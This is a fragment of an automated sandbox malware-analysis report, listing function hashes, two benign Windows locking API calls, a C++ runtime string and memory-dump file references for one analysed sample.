                                                                                                                                                                                                                                                                • Opcode ID: e3313f355f4262e4aee77c84f65f003206437021610f510b8a0c0ce9b56f8ccb
                                                                                                                                                                                                                                                                • Instruction ID: 49955a5a2f8e361df205bd5cda239a701fc750f7933f95105447d64667ecc4bd
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e3313f355f4262e4aee77c84f65f003206437021610f510b8a0c0ce9b56f8ccb
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 79117CB45113049FD742DF29E9926847BF8FB5C30AF81A16AE8098B3B0E7B1A941DF45
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • AcquireSRWLockExclusive.KERNEL32(0035648C,ios_base::badbit set,?,?,00331C84,00356478,00331B17), ref: 003329DF
                                                                                                                                                                                                                                                                • ReleaseSRWLockExclusive.KERNEL32(0035648C,?,?,00331C84,00356478,00331B17), ref: 00332A19
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2546206815.0000000000331000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00330000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2546179792.0000000000330000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2546240321.000000000034C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2546279689.0000000000355000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2546298594.0000000000358000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2546329083.000000000035A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2546354157.000000000035D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_330000_cd2469328d.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ExclusiveLock$AcquireRelease
                                                                                                                                                                                                                                                                • String ID: ios_base::badbit set
                                                                                                                                                                                                                                                                • API String ID: 17069307-3882152299
                                                                                                                                                                                                                                                                • Opcode ID: 7936fca03474572396c33a4047219b93dd75fe3ee437d2938f019ec66f2d6a30
                                                                                                                                                                                                                                                                • Instruction ID: c68281c861aa9789a1de3e04c7269859f17442c06503819a2f82e2d8ebc08e7c
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7936fca03474572396c33a4047219b93dd75fe3ee437d2938f019ec66f2d6a30
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 62F0A034500200DFCB22AF19E884B26BBBCFB85776F10032EE89A476B0CB312842CA51